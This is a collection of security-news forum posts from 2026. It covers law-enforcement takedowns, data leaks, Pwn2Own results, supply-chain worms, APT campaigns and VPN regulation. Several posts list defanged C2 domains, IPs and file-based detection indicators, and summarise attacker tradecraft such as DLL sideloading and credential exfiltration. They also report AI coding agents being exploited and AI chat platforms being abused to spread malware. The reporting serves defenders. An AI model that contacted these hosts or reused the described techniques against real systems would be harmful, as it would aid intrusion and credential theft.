In a major international law enforcement sting coordinated by Europol and Eurojust, authorities have officially seized and dismantled "First VPN" (operating via 1vpns.com, .net, .org, and various Tor onion domains).

The service was a staple of the underground economy, aggressively marketed on Russian-speaking cybercrime forums as a "bulletproof" gateway designed specifically to help ransomware gangs and initial access brokers evade tracking.

The Reality of "Bulletproof" No-Logs Claims: The most critical takeaway for the privacy community is how the takedown was handled. Despite advertising total anonymity and hidden architecture, the VPN's infrastructure was completely compromised from within:

• The Honeypot Phase: Joint investigators from France and the Netherlands secretly gained access to the VPN's infrastructure back in December 2021.
• Database Seizure: Law enforcement successfully obtained the service's complete user database and monitored live connections before pulling the plug. CyberInsider
• Direct Notifications: Every single user connecting to the service has been logged, identified, and sent a direct notification on the seized domains informing them that their real IP addresses and telemetry are now in the hands of global intelligence agencies. www.eurojust.europa.eu

The Takedown Metrics:

• 33 servers decommissioned across Europe. www.eurojust.europa.eu
• The primary administrator's residence was raided and searched in Ukraine. www.eurojust.europa.eu
• 83 discrete intelligence packages containing clear traffic data for 506 high-value users have already been distributed to active international investigations. BeveiligingNieuws

This serves as another stark reminder to the community: if a VPN service markets itself strictly on its ability to evade the law, it is a primary target for a multi-year infiltration, and its "no-logs" architecture will mean nothing once the hypervisor or infrastructure is seized.

Source: https://www.europol.europa.eu/media-press/newsroom/news/cybercriminal-vpn-used-ransomware-actors-dismantled-in-global-crackdown

Shortly after announcing that its delayed, gold-plated T1 smartphone would finally begin shipping, TrumpMobile. com was found to be suffering from a critical web security exploit. A security researcher discovered a flaw that allowed anyone to scrape the company's complete preorder database and submit arbitrary fake orders.

The Flaw & Data Exposure:

The vulnerability resided within the site’s backend infrastructure (specifically targeting order processing endpoints). Unauthenticated requests allowed the researcher to dump cleartext customer records, exposing:

• Full Names
• Physical/Mailing Addresses
• Primary Email Addresses
• Unique Order Identifiers

High-profile buyers who purchased the $499 phone out of curiosity - including YouTubers Coffeezilla and penguinz0 - were contacted directly by the researcher and confirmed the accuracy of their exposed personal data. No credit card information or payment data appears to have been caught in the leak.

The Operational Leak (The Real Data):

Beyond the privacy implications, the database dump inadvertently exposed the company's actual sales volume. While initial viral marketing metrics claimed roughly 590,000 reservation deposits, the database sequence numbers and unique identifiers indicate the platform only has approximately 10,000 unique customers with roughly 30,000 total smartphone orders.

Supply Chain Context:

The hardware itself is facing intense regulatory scrutiny. Initially marketed with a "Made in the USA" pledge, the branding was quietly altered to "designed with American values." Senator Mark Warner (Senate Intelligence Committee) recently issued an official inquiry demanding full transparency regarding the phone's true OEM suppliers, motherboard origins, and potential Chinese component sourcing.

The security flaw on the preorder site was reportedly patched on May 20, 2026, following zero-response to initial administrative disclosure attempts.

Full Technical Details & Coverage Timeline:

https://www.technadu.com/trump-mobile-reportedly-leaks-customer-data-from-t1-smartphone-orders/628185/

Pwn2Own Berlin 2026 (hosted at OffensiveCon) has officially wrapped up, and the numbers are wild: $1,298,250 paid out across 47 unique zero-days.

While core OS environments like Windows 11 and RHEL took their usual beatings, this year's distinct focus was on enterprise architecture and—for the first time - AI developer infrastructure.

Here is how the top players carved up the schedule:

1. DEVCORE's Clean Sweep (Master of Pwn)

DEVCORE dominated the scoreboard, walking away with $505,000 and 50.5 points. The undisputed MVP was Orange Tsai, who executed two of the highest-value chains of the entire event:

• Microsoft Exchange RCE: Chained 3 zero-days to achieve unauthenticated Remote Code Execution as SYSTEM, netting a $200,000 bounty.
• Microsoft Edge Sandbox Escape: Chained 4 complex logic bugs to break out of the browser sandbox entirely, scoring $175,000.
• Microsoft SharePoint: Team member splitline closed out Day 3 by chaining 2 bugs to completely exploit SharePoint for $100,000.

2. Virtualization & Infrastructure Heavy Hitters

• VMware ESXi: STARLabs SG (Nguyen Hoang Thach) hit ESXi using a nasty memory corruption bug combined with a cross-tenant code execution add-on, claiming a maximum $200,000 single payout.
• NVIDIA Container Toolkit: Valentina Palmiotti (chompie) of IBM X-Force secured $70,000 on Day 1 by dropping a zero-day chain that successfully rooted Red Hat Linux and popped the NVIDIA container layer.

3. The New Meta: Shattering AI Coding Agents

"Vibe coding" security took a massive reality check. AI developer platforms and coding assistants were systematically picked apart:

• OpenAI Codex: Successfully exploited three separate times across the event by three different teams (Viettel, Compass Security, and Ikotas Labs), completely exposing a broad attack surface in AI execution sandboxes.
• Anthropic Claude Code & Cursor: Both fell to code-injection and external control bypasses, proving that local AI integrations are becoming a massive, highly targetable Initial Access vector for enterprises.

What happens next?

The clock is ticking. Vendors now have exactly 90 days to push security patches to the public before Trend Micro's Zero Day Initiative (ZDI) drops the full, unredacted technical write-ups and PoCs.

Full Standings, Bounties, and Vulnerability Targets List:
https://www.bleepingcomputer.com/news/security/hackers-earn-1-298-250-for-47-zero-days-at-pwn2own-berlin-2026/

INTERPOL has released the final results of Operation Ramz, a coordinated 13-nation takedown targeting transnational cybercrime infrastructure across the Middle East and North Africa (MENA). Running from late 2025 through February 28, 2026, the operation resulted in 201 arrests and the decommissioning of 53 malicious servers.

The Technical Takedowns: The operation focused heavily on neutralizing Initial Access Broker (IAB) pathways and active phishing infrastructure:

• PhaaS Platform Defeated (Algeria): Authorities successfully dismantled a localized Phishing-as-a-Service (PhaaS) network, seizing the primary deployment server, underlying phishing scripts, and development hard drives.
• Endpoint Hijack Rings Neutralized (Qatar): Investigators mapped and secured a cluster of compromised enterprise endpoints that threat actors were utilizing as stealth vectors/proxies for outbound threat propagation.
• Banking Exfil Kits Seized (Morocco): Raids netted hardware containing active phishing development software alongside harvested banking databases and exfiltrated credential caches.
• Vulnerable Server Disruption (Oman): A private server storing sensitive data that had been backdoored and actively abused as a malware distribution point was completely decommissioned.

Private Sector Intel Synergy: The infrastructure tracking was heavily accelerated by telemetry and threat intelligence packages provided by private cybersecurity firms, including Group-IB, Kaspersky, the Shadowserver Foundation, and Team Cymru.

Human Trafficking/Scam Nexus: Similar to operations in Southeast Asia, the raid in Jordan highlighted the growing dark sector trend of cyber-slavery. Authorities freed 15 Asian nationals who had been trafficked under false job promises, had their passports confiscated, and were being forced to operate financial fraud infrastructure.

Full Technical Breakdown & Regional Impact Analysis: https://www.technadu.com/interpols-operation-ramz-disruption-of-transnational-cybercrime-networks-over-200-individuals-arrested/627967/

Last week, the TeamPCP threat group shocked the security community by dumping the full source code of their Shai-Hulud worm onto GitHub—even offering a $1,000 "bounty competition" on BreachForums for the biggest supply chain hack. The fallout is already here.

Researchers at Ox Security have caught the first wave of copycat packages hitting the npm registry, racking up over 2,600 downloads via aggressive typosquatting.

The "Devouring" Self-Propagation Mechanics: Named after the Dune sandworms, Shai-Hulud is highly dangerous because it targets developer environments and CI/CD pipelines to self-propagate:

1. It infects a developer's workstation via typosquatted dependencies.
2. It harvests npm tokens, GitHub personal access tokens (PATs), AWS keys, and Kubernetes secrets.
3. It uses the stolen credentials to automatically inject its payload into the victim’s legitimate repositories, publishing tainted updates on their behalf to infect downstream targets.

The First Discovered Clones:

A threat actor using the handle deadcode09284814 pushed four un-obfuscated packages, utilizing the leaked source code with customized C2 servers:

• chalk-tempalte: A direct, un-obfuscated clone of the Shai-Hulud worm. Drops stolen credentials to a new public GitHub repo titled "A Mini Sha1-Hulud has Appeared" and a C2 at 87e0bbc636999b[.]lhr[.]life.
• axois-utils: Deviates from the worm structure to deploy a Go-based DDoS botnet called Phantom Bot (establishing persistence via Windows Startup and scheduled tasks).
• deadcode09284814/axios-util & color-style-utils: Standard infostealers grabbing cloud environment variables.

Defensive Actions & Blue Team IoCs:

If you run a JS shop, check your environment for:

• Outbound hits to 87e0bbc636999b[.]lhr[.]life or 80[.]200[.]28[.]28:2222.
• Malicious hooks or file creations within IDEs or Coding Agents (like Claude Code configuration states).
• Audit for any repository initialization patterns matching the "Mini Sha1-Hulud" exfil pattern.

Full Technical Analysis & Complete Hash List: https://www.technadu.com/first-shai-hulud-worm-clones-emerge-in-npm-supply-chain/627948/

The ongoing internet blackout in Iran (the longest on record since February 28) has shifted from a "censorship" issue to a full-blown economic crisis for women. For those who built a "parallel labor market" on Instagram and remote platforms, the internet wasn't just for social media - it was their only source of income.

The VPN Economic Barrier:

• Unattainable Costs: Local workers, like a Tehran yoga instructor and a rural food seller named Leila, report spending upwards of 5 million tomans (~$40 USD) on VPNs just to maintain a connection. In a tanking economy, this cost is often more than their monthly profit.
• The Stability Gap: Even expensive VPNs are described as "costly and unstable," making professional work like online teaching or translation nearly impossible to sustain.
• Gendered Impact: With female labor participation at 18%, the digital space was the primary entry point for women. Experts now describe the current state as "internet apartheid," where only those with state-approved connections or high-tier VPNs can participate in the global economy.

The Numbers: According to Iran's Deputy Labor Minister, the conflict and resulting blackouts have led to roughly 1 million lost jobs, with women in informal and digital sectors being the first to be laid off or lose their customer bases.

Full Report on the Digital Labor Collapse:
https://www.rferl.org/a/iran-internet-blackout-women-brunt-labor-market/33755949.html

The Belarus-aligned APT Ghostwriter (UNC1151/UAC-0057) has launched a new campaign targeting Ukrainian government entities with a highly surgical infection chain. ESET researchers recently documented how the group is using server-side geographic validation to keep their latest tools under the radar.

The "Geofence" Gatekeeper:

The attack starts with a spearphishing PDF impersonating Ukrtelecom. The clever part is in the delivery server:

• Ukrainian IPs: Receive a weaponized RAR archive containing a JavaScript-based PicassoLoader.
• Non-Ukrainian IPs: Receive a benign, non-malicious PDF about 2024–2026 telecommunications regulations. This significantly complicates automated sandbox analysis and remote researcher triage.

Technical Chain: PicassoLoader to Cobalt Strike

1. First-Stage JS: Drops a decoy PDF to keep the user distracted while executing the second-stage downloader.
2. PicassoLoader (JS Variant): This version fingerprints the host every 10 minutes (OS version, boot time, active PIDs) and waits for a manual "Go" signal from the operator.
3. Cobalt Strike Beacon: Once the victim is confirmed as high-value, the C2 pushes the final Cobalt Strike beacon (disguised as %ProgramData%\ViberPC.dll) for persistent espionage.

Operational Shift:

Ghostwriter is increasingly moving away from weaponized Excel docs (2025 tactic) toward JavaScript/PDF chains, likely in response to enhanced Microsoft 365 macro protections.

Full Indicators of Compromise (IoCs) and Attack Chain Diagrams:

https://www.technadu.com/suspected-belarusian-state-nexus-actors-target-ukraine-with-new-cobalt-strike-cyberespionage-campaign/627880/

Valery Fadeev, head of Russia’s Human Rights Council, has publicly conceded that a total ban on VPNs is technically unachievable and would likely "break" the country's digital economy.

The Technical Reality Check:

• Infrastructure Dependency: Fadeev admitted that Russia’s banking systems, tech firms, and software developers rely heavily on VPN protocols for secure remote access and cross-system operations. A blanket ban would cause "catastrophic" disruptions to financial services.
• Complex Ecosystem: Officials now acknowledge that VPN technology is too deeply integrated into the modern internet to be surgically removed without damaging broader connectivity.
• The "Enemy Propaganda" Stance: Despite the technical surrender, Fadeev continues to frame civilian VPN use for accessing independent media as "enemy propaganda," suggesting that while the tools won't be banned entirely, the government will continue to focus on "reducing" usage through other means.

Why this matters for the VPN industry:

This admission signals a shift from "Total Ban" rhetoric to a "Whitelisting" model, where the government attempts to block consumer VPNs while preserving tunnels for state-loyal businesses - a strategy that has historically proven difficult to enforce via DPI (Deep Packet Inspection).

Source: https://cyberinsider.com/russian-official-admits-vpns-cannot-be-fully-blocked-without-breaking-the-internet/

A Q1 2026 intelligence report has mapped a sprawling campaign by the Iran-linked APT MuddyWater (Static Kitten), confirming breaches across nine countries -including a major South Korean electronics manufacturer.

The Tradecraft: DLL Sideloading The group continues to successfully evade EDR by abusing legitimate, signed binaries. In this campaign, they were observed sideloading malicious DLLs via:

• sentinelmemoryscanner.exe (SentinelOne)
• fmapp.exe (Fortemedia)

Technical Payloads: The sideloaded DLLs contained ChromElevator, a post-exploitation tool specifically designed to bypass UAC and extract credentials from Chromium-based browsers.

Tactical Shift: Instead of traditional custom backdoors, MuddyWater is moving toward a Node.js runtime environment to execute their PowerShell logic. This handles:

• Privilege Escalation & SAM Hive Theft
• SOCKS5 Reverse-Proxy Tunneling
• Exfiltration via sendit.sh: By using public file-transfer services, they successfully blended exfiltration traffic with standard cloud operations, bypassing many network perimeter alarms.

Impact: The electronics manufacturer was compromised for a full week before detection. This highlights a persistent gap in how legacy behavioral analysis handles "living-off-the-land" (LotL) techniques combined with signed binary abuse.

Full Technical Analysis & IoC Breakdown: https://www.technadu.com/iran-linked-muddywater-group-breached-organizations-in-9-countries-in-q1-2026-including-major-electronics-maker/627875/

According to the threat actor, the alleged data includes repositories tied to:

• AI training
• Fine-tuning
• Benchmarking
• Inference systems
• Future projects and experiments

However, Mistral AI currently says there is no evidence its internal infrastructure was breached.

What the company did confirm is exposure to the broader TanStack supply chain attack, where compromised NPM and PyPI packages reportedly:

• Harvested developer credentials
• Targeted Linux environments
• Deployed malware
• Attempted secret extraction from developer systems

Mistral advised affected users to:

• Stop using impacted package versions immediately
• Rotate all accessible secrets
• Review cloud audit logs
• Monitor for suspicious outbound connections to known C2 infrastructure

This case is another reminder that supply chain compromises increasingly target developer environments rather than production systems directly. Compromised developer machines can become a gateway into CI/CD pipelines, repositories, cloud infrastructure, and AI training environments.

Do you think developer ecosystem attacks are now more dangerous than direct infrastructure attacks for AI companies?

Article:
https://www.technadu.com/teampcp-claims-mistral-ai-breach-the-company-announces-being-impacted-by-the-tanstack-supply-chain-attack/627870/

According to the disclosure, the attackers may have gained access to customer information including:
• Names
• Addresses
• Email addresses
• Phone numbers
• Order information
• Hashed passwords

Skoda says there’s currently no confirmed evidence of misuse, but it also admitted it cannot fully determine whether data was copied or accessed during the intrusion.

The company reportedly took the affected portal offline, patched the vulnerability, informed regulators, and brought in external forensic specialists.

Interesting detail: payment card processing was handled by external providers, so full credit card data was reportedly not exposed.

The automotive industry has become an increasingly attractive target for attackers because modern carmakers now operate large digital ecosystems involving e-commerce, mobile apps, connected vehicles, customer portals, and supplier infrastructure.

Do you think automotive companies are prepared for the cybersecurity risks tied to connected customer platforms and online commerce?

Article:
https://www.technadu.com/skoda-auto-carmaker-discloses-online-shop-intrusion-potentially-impacting-customer-data/627833/

Researchers uncovered an active malvertising campaign targeting macOS users through sponsored Google Ads and legitimate Claude ai shared chats.

According to reports:

• Users searching for “Claude mac download” were redirected through sponsored ads
• Fake Claude installation guides instructed users to run Terminal commands
• Malware silently downloaded and executed after command execution
• Multiple payload variants were identified

One variant reportedly:

• Harvests browser credentials
• Steals session cookies
• Extracts macOS Keychain contents
• Profiles devices before exfiltration

The campaign is particularly interesting because attackers are abusing legitimate AI collaboration infrastructure rather than relying solely on fake phishing domains.

This creates a stronger illusion of legitimacy since victims remain on trusted platforms while receiving malicious instructions.

Questions for community:
Could AI collaboration platforms become one of the next major social engineering attack surfaces for malware distribution?

Full Article: https://www.technadu.com/google-ads-and-claude-ai-shared-chats-abused-to-distribute-mac-malware/627723/

Some of the biggest stories this week included:

• Active exploitation of a cPanel flaw exposing 550,000+ servers
• PCPJack cloud worm harvesting Kubernetes, API, and SSH credentials
• Taiwan rail disruption caused by a TETRA radio exploit
• DNSSEC failure briefly taking millions of German websites offline
• AI-driven cyberwarfare warnings from the Armis 2026 report
• Insider-risk concerns around employees selling corporate logins
• Water treatment systems in Poland reportedly breached
• Canvas login-page defacements tied to ShinyHunters activity

One major trend stands out: attackers are increasingly focusing on identities, credentials, insider access, and trusted infrastructure rather than only traditional endpoint malware.

The cloud ecosystem, AI-driven attacks, supply chains, and human trust all continue expanding the attack surface simultaneously.

Question for community:
Which issue worries you most right now:

• AI-powered attacks
• Insider threats
• Critical infrastructure targeting
• Cloud credential theft
• Supply chain compromise
• Something else entirely?

Full Article: https://www.technadu.com/credentials-classrooms-and-confidence-cracked-this-week/627653/

Trellix (the entity formed by the McAfee/FireEye merger) has officially confirmed unauthorized access to a portion of its internal source code repository. While the company maintains that its build and distribution pipelines remain secure, the involvement of RansomHouse adds a significant extortion layer to the incident.

Technical Breakdown:

• Incident Window: Trellix identified the breach in early May 2026, though RansomHouse claims the initial compromise occurred on April 17, 2026.
• The "Map" Risk: The primary concern for the security community isn't just the code itself, but the detection logic. Access to source code allows threat actors to reverse-engineer how EDR/NDR products "see" threats, enabling the development of highly effective evasion techniques.
• Scope: Trellix states there is currently no evidence that the accessed code is being exploited or that signing keys/build paths were compromised. However, they have engaged external forensics to verify the full extent of the lateral movement.

Impact for Blue Teams: If you rely on Trellix for enterprise defense, this is a "watch cadence" event. While no patches are required yet, the exposure of proprietary logic increases the risk of downstream "blind spots" in the coming months.

Full Report and Forensic Timeline: https://www.technadu.com/trellix-source-code-repository-breach-claimed-by-ransomhouse/627536/

A new supply chain campaign is currently targeting developers within the .NET ecosystem, specifically those using Chinese-language enterprise libraries. Researchers at Socket discovered five malicious packages (impersonating AntdUI) that have already racked up 65,000 downloads.

The Tactic: Reputation & Stealth The threat actor, bmrxntfj, used a clever trick to hide the payload: of the 224 versions published, 219 were set to "listed: false." This allowed the malicious code to sit on the NuGet registry without appearing in standard search results, while still being fetchable by CI/CD pipelines or automated build tools.

The Payload: The packages deploy a sophisticated infostealer protected by .NET Reactor. It doesn't just go after browsers; it specifically targets:

• Infrastructure Assets: SSH private keys, Outlook profiles, and Steam sessions.
• Dev Environments: Local files in Desktop, Documents, and Downloads.
• Crypto: 12 different browsers and 8 desktop wallets.

IoCs for your Detection Stack: If you're running a .NET shop, audit your build servers for these markers:

• C2 Domain: dns-providersa2[.]com (Registered March 2026)
• IP Address: 62[.]84[.]102[.]85
• File Alert: Monitor for any creation of C:\ProgramData\Microsoft OneDrive\keys.dat (Legitimate OneDrive never uses this).
• Process Alert: Look for CoCreateInstance calls requesting the Edge IElevator interface outside of the Edge browser family.

Affected Packages: IR.DantUI, IR.Infrastructure.Core, IR.Infrastructure.DataService.Core, IR.iplus32, and IR.OscarUI.

Full technical analysis and hash list: https://www.technadu.com/malicious-nuget-packages-target-chinese-net-ecosystem-developers/627373/

Palo Alto Networks has confirmed active exploitation of a critical zero-day (CVE-2026-0300) affecting the User-ID Authentication Portal (Captive Portal) in PAN-OS.

The Vulnerability: This is a classic buffer overflow triggered by specially crafted packets sent to the portal. Because the Captive Portal service often sits on the edge, this allows an unauthenticated attacker to execute arbitrary code with root privileges on PA-Series and VM-Series firewalls.

Exploitation Status: Palo Alto is reporting "limited exploitation" in the wild, specifically targeting portals exposed to the public internet. If your management or captive portal is WAN-facing, you are currently at high risk.

Patch Schedule:

• Round 1: Targeted for May 13th.
• Round 2: Targeted for May 28th.
• Note: Prisma Access and Cloud NGFW are reportedly not affected.

Immediate Mitigation: Until May 13th, the only reliable defense is to disable the User-ID Authentication Portal on all untrusted interfaces or restrict access to specific, trusted internal IP ranges.

Full Technical Analysis & Affected Versions: ⬇️
https://www.technadu.com/palo-alto-networks-to-patch-exploited-pan-os-zero-day-cve-2026-0300-starting-may-13/627358/

The UK’s "Children’s Wellbeing and Schools Act 2026" has officially moved forward, and it contains a specific provision that could change the VPN landscape in Europe. For the first time, the government is looking to close the "loophole" where minors use VPNs to bypass the Online Safety Act's age checks.

Key Provisions in the Act:

• Mandatory Age Assurance: VPN providers may be required to implement "highly effective" age verification for UK-based users.
• The 12-Month Clock: The Secretary of State now has a mandate to lay regulations within 12 months to prohibit "relevant VPN services" from being provided to children under 18.
• Ofcom Oversight: Ofcom will likely be the body issuing guidance on how VPNs must comply, including potential blacklisting for non-compliant services.

The Privacy Conflict:

Digital rights groups are warning that this is a "second-order censorship" move. If VPNs are forced to verify age, they must collect user ID data, which fundamentally breaks the "No-Logs" promise and privacy-first nature of these tools.

Official Source & Impact Analysis:

You can track the bill's progress on the UK Parliament site https://www.gov.uk/government/news/landmark-consultation-seeks-views-on-major-measures-to-protect-children-on-social-media-gaming-platforms-and-ai-chatbots

I've put together a full breakdown of the specific amendments (including the January House of Lords vote) and what this means for the future of "private" browsing in the UK:

https://www.technadu.com/uk-vpn-ban-for-children-proposal-raises-safety-questions/627344/

A sophisticated phishing campaign, dubbed VENOMOUS#HELPER, has successfully breached over 80 US-based organizations since early 2025. This isn't your standard "click-and-steal" credential harvest; it’s a high-level Initial Access Broker (IAB) play using legitimate software to stay invisible.

The Persistence Playbook: The attackers aren't using custom malware that triggers EDR. Instead, they are deploying a Dual-Channel RMM architecture:

• Primary: A self-hosted, cracked build of SimpleHelp 5.0.1 (packaged via JWrapper).
• Secondary: A ConnectWise ScreenConnect relay.

By deploying two independent, legitimate RMM tools simultaneously, they ensure that even if IT detects and removes one, the second channel remains active.

Stealth Mechanics: The operators are reportedly monitoring the victim’s idle state. They only activate the remote session when the cursor has been static for an extended period (indicating the user is away from the desk), making it extremely difficult for an employee to "catch" the remote access in real-time.

Attack Chain:

1. Lure: High-pressure Social Security Administration (SSA) themed emails.
2. Redirect: Users are sent to compromised Mexican business sites (acting as proxies).
3. Payload: A JWrapper executable that installs the silent RMM tools.

Why this matters: This activity is consistent with a ransomware precursor. If you’re seeing unauthorized SimpleHelp or ScreenConnect traffic on port 8041, you likely have an IAB already sitting on the network.

Full Technical Breakdown and IoCs: https://www.technadu.com/phishing-campaign-impersonating-the-u-s-social-security-administration-targets-80-organizations/627279/

We’ve been tracking the new age-verification laws, and Utah just set a really weird precedent that might affect VPN users nationwide. Starting May 6th, SB 73 officially takes aim at using VPNs to bypass state blocks.

The three biggest concerns for this community:

1. "Physical Location" over IP: The law says if you are physically in Utah, you are legally under Utah jurisdiction even if your VPN IP says you're in Switzerland.
2. The Gag Order: Websites are now legally banned from even suggesting or showing users how to use a VPN to get around these checks.
3. The "Nuclear Option": Because sites can't easily "prove" where a VPN user is, experts (like the EFF) are worried sites will just start blocking all known VPN IP ranges entirely to avoid lawsuits.

This seems like a massive technical mess. How are these sites even supposed to "verify" a masked user without a total VPN ban? Curious if anyone here in Utah is already seeing blocks.

Full Article: https://www.eff.org/deeplinks/2026/04/utahs-new-law-regulating-vpns-goes-effect-next-week